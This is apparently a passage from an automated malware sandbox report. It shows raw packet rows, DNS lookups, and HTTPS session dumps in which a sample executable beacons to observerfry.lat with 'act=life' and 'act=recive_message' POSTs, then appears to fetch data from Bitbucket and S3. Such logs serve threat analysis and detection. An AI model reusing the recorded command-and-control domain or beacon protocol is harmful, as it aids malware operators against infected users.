                                                                                                                                                                    Dec 23, 2024 08:04:37.213423014 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.213433027 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.216952085 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.216974974 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.217004061 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.217021942 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.217050076 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.221635103 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.387425900 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.387454987 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.387505054 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.387533903 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.387562990 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.387583017 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.391082048 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.391108990 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.391140938 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.391160011 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.391172886 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.394103050 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.394126892 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.394155979 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.394167900 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.394185066 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.397547007 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.397577047 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.397610903 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.397624969 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.397635937 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.400420904 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.400444031 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.400482893 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.400501966 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.400516033 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.404280901 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.404306889 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.404365063 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.404378891 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.404396057 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.404416084 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.407232046 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.407254934 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.407289028 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.407301903 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.407326937 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.407341003 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.426021099 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.426064014 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.578531981 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.578568935 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.578613043 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.578614950 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.578644991 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.578670979 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.581382990 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.581407070 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.581489086 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.581506014 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.584537029 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.584559917 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.584625959 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.584642887 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.584652901 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.587908030 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.587946892 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.587971926 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.588057995 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.588083982 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.588125944 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.590820074 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.590846062 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.590945005 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.590962887 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.591002941 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.591587067 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.594620943 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.594641924 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.594727993 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.594746113 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.597603083 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.597630024 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.597698927 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.597718954 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.597735882 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.601227045 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.601267099 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.601329088 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.601345062 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.601373911 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.601398945 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.655606031 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.771877050 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.771909952 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.771938086 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.771975994 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.772003889 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.772023916 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.775451899 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.775485039 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.775516033 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.775552034 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.775568008 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.782951117 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.782993078 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.783024073 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.783051014 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.783077002 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.783087969 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.785234928 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.785260916 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.785300970 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.785304070 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.785329103 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.785342932 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.785342932 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.786883116 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.786909103 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.786942005 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.786968946 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.786983967 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.788361073 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.788383007 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.788413048 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.788434982 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.788450956 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.791753054 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.791789055 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.791834116 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.791866064 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.791893005 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.791913033 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.792826891 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.817126036 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.843445063 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.962599039 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.962627888 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.962682962 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.962691069 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.962723017 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.962737083 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.965715885 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.965775013 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.965789080 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.965805054 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.965836048 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.969160080 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.969216108 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.969257116 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.969273090 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.969285011 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.972145081 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.972193956 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.972235918 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.972244978 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.972264051 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.975713015 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.975759029 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.975804090 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.975812912 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.975882053 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.978818893 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.978872061 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.978895903 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.978919029 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.978934050 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.982342005 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.982377052 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.982408047 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.982417107 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.982429028 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.982456923 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.985584021 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.985601902 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.985681057 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.985688925 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.985733032 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.985975981 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.987473011 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.019061089 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.156265974 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.156296015 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.156331062 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.156392097 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.156424046 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.156439066 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.161396027 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.161417007 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.161470890 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.161489964 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.161509037 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.165436029 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.165451050 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.165493011 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.165517092 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.165544033 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.165564060 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.165586948 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.165606022 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.225461006 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.254441977 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.465023994 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.465056896 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.465101004 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.465106964 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Dec 23, 2024 08:04:08.808532000 CET5226453192.168.2.101.1.1.1
                                                                                                                                                                    Dec 23, 2024 08:04:08.946300030 CET53522641.1.1.1192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.457187891 CET6156753192.168.2.101.1.1.1
                                                                                                                                                                    Dec 23, 2024 08:04:31.594264984 CET53615671.1.1.1192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:33.674592018 CET6181053192.168.2.101.1.1.1
                                                                                                                                                                    Dec 23, 2024 08:04:33.963689089 CET53618101.1.1.1192.168.2.10
                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 23, 2024 08:04:08.808532000 CET192.168.2.101.1.1.10xf5d5Standard query (0)observerfry.latA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:31.457187891 CET192.168.2.101.1.1.10xaa87Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:33.674592018 CET192.168.2.101.1.1.10x91e6Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 23, 2024 08:04:08.946300030 CET1.1.1.1192.168.2.100xf5d5No error (0)observerfry.lat104.21.36.201A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:08.946300030 CET1.1.1.1192.168.2.100xf5d5No error (0)observerfry.lat172.67.199.72A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:31.594264984 CET1.1.1.1192.168.2.100xaa87No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:31.594264984 CET1.1.1.1192.168.2.100xaa87No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:31.594264984 CET1.1.1.1192.168.2.100xaa87No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:33.963689089 CET1.1.1.1192.168.2.100x91e6No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:33.963689089 CET1.1.1.1192.168.2.100x91e6No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:33.963689089 CET1.1.1.1192.168.2.100x91e6No error (0)s3-w.us-east-1.amazonaws.com52.217.18.140A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:33.963689089 CET1.1.1.1192.168.2.100x91e6No error (0)s3-w.us-east-1.amazonaws.com52.217.98.100A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:33.963689089 CET1.1.1.1192.168.2.100x91e6No error (0)s3-w.us-east-1.amazonaws.com54.231.138.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:33.963689089 CET1.1.1.1192.168.2.100x91e6No error (0)s3-w.us-east-1.amazonaws.com52.217.92.156A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:33.963689089 CET1.1.1.1192.168.2.100x91e6No error (0)s3-w.us-east-1.amazonaws.com54.231.172.89A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:33.963689089 CET1.1.1.1192.168.2.100x91e6No error (0)s3-w.us-east-1.amazonaws.com52.217.233.209A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:33.963689089 CET1.1.1.1192.168.2.100x91e6No error (0)s3-w.us-east-1.amazonaws.com54.231.162.233A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 23, 2024 08:04:33.963689089 CET1.1.1.1192.168.2.100x91e6No error (0)s3-w.us-east-1.amazonaws.com3.5.20.54A (IP address)IN (0x0001)false
                                                                                                                                                                    • observerfry.lat
                                                                                                                                                                    • bitbucket.org
                                                                                                                                                                    • bbuseruploads.s3.amazonaws.com
                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.1049701104.21.36.2014437200C:\Users\user\Desktop\Yh6fS6qfTE.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-23 07:04:10 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                    Host: observerfry.lat
                                                                                                                                                                    2024-12-23 07:04:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                    2024-12-23 07:04:10 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 23 Dec 2024 07:04:10 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=boosfpv5e3lr8emnqfhc1bd8vl; expires=Fri, 18 Apr 2025 00:50:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qx9KnLD%2BaPmG1AmR9JFjW8oTXGj%2B79YSwITY4o69qJ19je7wouZfeAFImsF51xi3nRv9FYaS1HZMuXfwjAewtpmuR6nnVFM4irBQKJPCJYa5UG7JaCouC0D8Dqwtph8ull4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f667ef94856440e-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1548&rtt_var=611&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1747456&cwnd=236&unsent_bytes=0&cid=a2c58276354dd315&ts=776&x=0"
                                                                                                                                                                    2024-12-23 07:04:10 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                                    2024-12-23 07:04:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.1049703104.21.36.2014437200C:\Users\user\Desktop\Yh6fS6qfTE.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-23 07:04:12 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 53
                                                                                                                                                                    Host: observerfry.lat
                                                                                                                                                                    2024-12-23 07:04:12 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                    2024-12-23 07:04:12 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 23 Dec 2024 07:04:12 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=r7jbuiu1grmjdbrp41h40jc5dn; expires=Fri, 18 Apr 2025 00:50:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
